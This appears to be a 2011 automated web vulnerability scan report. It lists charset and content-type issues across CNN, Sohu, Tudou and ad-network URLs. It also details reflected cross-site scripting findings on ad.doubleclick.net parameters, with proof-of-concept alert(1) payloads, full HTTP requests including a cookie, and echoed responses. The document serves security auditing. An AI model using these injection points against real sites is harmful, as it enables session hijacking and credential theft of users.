18.64. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.tech.html

18.65. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.video.html

18.66. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.wallstreet.html

18.67. http://money.cnn.com/.element/ssi/tools/5.0/bubble.html

18.68. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html

18.69. http://money.cnn.com/fn_adspaces/creatives/2010/4/14/336x260_survey.html

18.70. http://myseofriend.net/myseofriendlog.php

18.71. http://now.eloqua.com/visitor/v200/svrGP.aspx

18.72. http://seg.sharethis.com/getSegment.php

18.73. http://showadsak.pubmatic.com/AdServer/AdServerServlet

18.74. http://svcs.cnn.com/weather/getForecast

18.75. http://uac.advertising.com/wrapper/aceUACping.htm

18.76. http://ui.tudou.com/js/embed/xstorage/index.html

18.77. http://www.ask.com/display.html

18.78. http://www.cnn.com/.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html

18.79. http://www.cnn.com/.element/ssi/www/breaking_news/3.0/banner.html

18.80. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

18.81. http://www.imdb.com/tv/widget/grid

18.82. http://www.tudou.com/

18.83. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

18.84. http://www.wireless.att.com/navservice/navservlet

18.85. http://www.zedo.com/shared/commonHeader.htm

18.86. http://wzus1.ask.com/i/b.html

19. HTML uses unrecognised charset

19.1. http://count36.51yes.com/click.aspx

19.2. http://custom.exoclick.com/xhamster-945x100.php

19.3. http://images.sohu.com/bill/s2011/hailiu/huyi/aili/0815/index.html

19.4. http://lifeng.com/favicon.ico

19.5. http://news.sohu.com/s2011/dajijiamao/

19.6. http://news.soso.com/n.q

19.7. http://v2.tudou.com/tdct/commonadv.html

19.8. http://www.ipraction.cn/

19.9. http://www.sohu.com/

19.10. http://www.soso.com/

19.11. http://www.soso.com/wh.q

20. Content type incorrectly stated

20.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

20.2. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

20.3. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

20.4. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

20.5. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

20.6. http://answers.ask.com/favicon.ico

20.7. http://auto.sohu.com/zhuanti/ten/new_model.js

20.8. http://bes-clck.com/v

20.9. http://clients1.google.com/complete/search

20.10. http://content.pop6.com/banners/aff/35057/120x160/120x160_Dayss.flv

20.11. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_Masami.flv

20.12. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_marry.flv

20.13. http://count36.51yes.com/click.aspx

20.14. http://faxin.soso.com/scripts/gift.js

20.15. http://hs.interpolls.com/cache/lionsgate/conan/300/inter_50.poll

20.16. http://hs.interpolls.com/evt.poll

20.17. http://hs.interpolls.com/imprimage.poll

20.18. http://hs.interpolls.com/ts1.poll

20.19. http://i.cdn.turner.com/money/fn_adspaces/creatives/2009/10/14/352812cnnm_twitter_10.12.09_336x280.gif

20.20. http://ipr.cntv.cn/library/column/2011/07/08/C30796/base.css

20.21. http://js.mail.sohu.com/passport/pi18030.201011300952.js

20.22. http://js.sohu.com/passport/pp18030_31.js

20.23. http://js.tudouui.com/js/page/index/v2/userInfo_11.js

20.24. http://myseofriend.net/myseofriendlog.php

20.25. http://news.soso.com/js/filter_dev.js

20.26. http://news.soso.com/js/img_smartbox.dev.js

20.27. http://now.eloqua.com/visitor/v200/svrGP.aspx

20.28. http://ping.crowdscience.com/ping.js

20.29. http://showadsak.pubmatic.com/AdServer/AdServerServlet

20.30. http://sp.ask.com/sh/i/a14/favicon/favicon.ico

20.31. http://static.youku.com/v1.0.0687/index/js/common.js

20.32. http://static.youku.com/v1.0.0687/index/js/header.js

20.33. http://static.youku.com/v1.0.0687/index/js/playlist.js

20.34. http://static.youku.com/v1.0.0687/index/js/searchprompt.js

20.35. http://static.youku.com/v1.0.0687/topic/js/QIndex.js

20.36. http://v2.tudou.com/tdct/commonadv.html

20.37. http://www.ask.com/favicon.ico

20.38. http://www.cnn.com/cnn_adspaces/3.0/homepage/main/bot1.120x90.ad

20.39. http://www.cnn.com/cnn_adspaces/3.0/homepage/spon2.126x31.ad

20.40. http://www.ipraction.cn/library/column/2011/07/04/C30830/style/base.css

20.41. http://www.sohu.com/upload/js/tuiguang_sohu_full_qq.js

20.42. http://www.sohu.com/upload/style/global1212.css

20.43. http://www.sohu.com/upload/style/layout091102.css

20.44. http://www.sohu.com/upload/style/style110805.css

20.45. http://www.soso.com/wh.q

20.46. http://www.tudou.com/my/tui/getFreshActMsg.html

20.47. http://www.tudou.com/my/tui/getOfficialVuserForSub.html

20.48. http://www.tudou.com/my/tui/multyCheckSub.srv

20.49. http://www.tudou.com/util/tools/www_hd.txt

20.50. http://www.wireless.att.com/cell-phone-service/dwr/interface/DWRRequestManager.js

20.51. http://www.wireless.att.com/cell-phone-service/images/cart/btn_close.gif

20.52. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

20.53. http://www.wireless.att.com/navservice/navservlet

20.54. http://www.youku.com/favicon.ico

21. Content type is not specified

21.1. http://sales.liveperson.net/hc/76226072/

21.2. http://stat.tudou.com/newstat/pv



1. Cross-site scripting (reflected)  next
There are 122 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [AdID parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48cae"-alert(1)-"5a8cb21eae7 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=55039148cae"-alert(1)-"5a8cb21eae7&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6291
Date: Mon, 15 Aug 2011 18:49:58 GMT
Expires: Mon, 15 Aug 2011 18:54:58 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed May 18 12:04:34 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/z%3B242851043%3B7-0%3B0%3B64882146%3B3454-728/90%3B42245616/42263403/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=55039148cae"-alert(1)-"5a8cb21eae7&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con1")
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf796'-alert(1)-'d09a3a56651 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391bf796'-alert(1)-'d09a3a56651&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6291
Date: Mon, 15 Aug 2011 18:50:02 GMT
Expires: Mon, 15 Aug 2011 18:55:02 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed May 18 12:04:52 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/x%3B242851043%3B9-0%3B0%3B64882146%3B3454-728/90%3B42245640/42263427/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391bf796'-alert(1)-'d09a3a56651&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con3\"
...[SNIP]...

1.3. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 269a2'-alert(1)-'82e91cf9990 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750269a2'-alert(1)-'82e91cf9990&AdID=550391&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6292
Date: Mon, 15 Aug 2011 18:49:53 GMT
Expires: Mon, 15 Aug 2011 18:54:53 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jul 22 13:57:17 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
"http://ad.doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/o%3B242851043%3B13-0%3B0%3B64882146%3B3454-728/90%3B43222784/43240571/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750269a2'-alert(1)-'82e91cf9990&AdID=550391&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smar
...[SNIP]...

1.4. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98719"-alert(1)-"53c96ebe774 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=40275098719"-alert(1)-"53c96ebe774&AdID=550391&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6292
Date: Mon, 15 Aug 2011 18:49:48 GMT
Expires: Mon, 15 Aug 2011 18:54:48 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jul 22 13:57:29 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
"http://ad.doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/y%3B242851043%3B14-0%3B0%3B64882146%3B3454-728/90%3B43222793/43240580/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=40275098719"-alert(1)-"53c96ebe774&AdID=550391&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smar
...[SNIP]...

1.5. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e974"-alert(1)-"84a663c2818 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=1e974"-alert(1)-"84a663c2818 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6292
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:50:25 GMT
Expires: Mon, 15 Aug 2011 18:55:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jul 22 13:57:17 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/83/%2a/o%3B242851043%3B13-0%3B0%3B64882146%3B3454-728/90%3B43222784/43240571/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=1e974"-alert(1)-"84a663c2818http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con2");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

1.6. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c519d'-alert(1)-'bf4a00d5369 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=c519d'-alert(1)-'bf4a00d5369 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6291
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:50:30 GMT
Expires: Mon, 15 Aug 2011 18:55:30 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed May 18 12:04:52 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
7/83/%2a/x%3B242851043%3B9-0%3B0%3B64882146%3B3454-728/90%3B42245640/42263427/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=c519d'-alert(1)-'bf4a00d5369http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con3\">
...[SNIP]...

1.7. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e6d'-alert(1)-'bc7014ab8a7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=8426044e6d'-alert(1)-'bc7014ab8a7&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6050
Date: Mon, 15 Aug 2011 18:50:11 GMT
Expires: Mon, 15 Aug 2011 18:55:11 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 15 11:27:47 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/click%3Bh%3Dv8/3b64/17/83/%2a/i%3B242851043%3B4-0%3B0%3B64882146%3B3454-728/90%3B41064361/41082148/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=8426044e6d'-alert(1)-'bc7014ab8a7&Values=1589&Redirect=http://www.ibm.com/innovation/us/leadership/hospitals/index.html?cmp=USBRB&cm=b&csr=agus_itlead-20101213&cr=cnnmoney&ct=USBRB301&cn=capleadhosp\">
...[SNIP]...

1.8. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f80b"-alert(1)-"bb197b2837 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=842604f80b"-alert(1)-"bb197b2837&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6216
Date: Mon, 15 Aug 2011 18:50:07 GMT
Expires: Mon, 15 Aug 2011 18:55:07 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 06 11:04:09 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
/click%3Bh%3Dv8/3b64/17/82/%2a/c%3B242851043%3B6-0%3B0%3B64882146%3B3454-728/90%3B41585980/41603767/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=842604f80b"-alert(1)-"bb197b2837&Values=1589&Redirect=http://www.ibm.com/systems/data/flash/smartercomputing/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomp-20110331&cr=cnnmoney&ct=usbrb301&cn=smartercomputing_flsh");
var fscUrl = u
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23fad'-alert(1)-'b48601feb9b was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=158923fad'-alert(1)-'b48601feb9b&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6050
Date: Mon, 15 Aug 2011 18:50:21 GMT
Expires: Mon, 15 Aug 2011 18:55:21 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 15 11:27:47 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Dv8/3b64/17/83/%2a/i%3B242851043%3B4-0%3B0%3B64882146%3B3454-728/90%3B41064361/41082148/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=158923fad'-alert(1)-'b48601feb9b&Redirect=http://www.ibm.com/innovation/us/leadership/hospitals/index.html?cmp=USBRB&cm=b&csr=agus_itlead-20101213&cr=cnnmoney&ct=USBRB301&cn=capleadhosp\">
...[SNIP]...

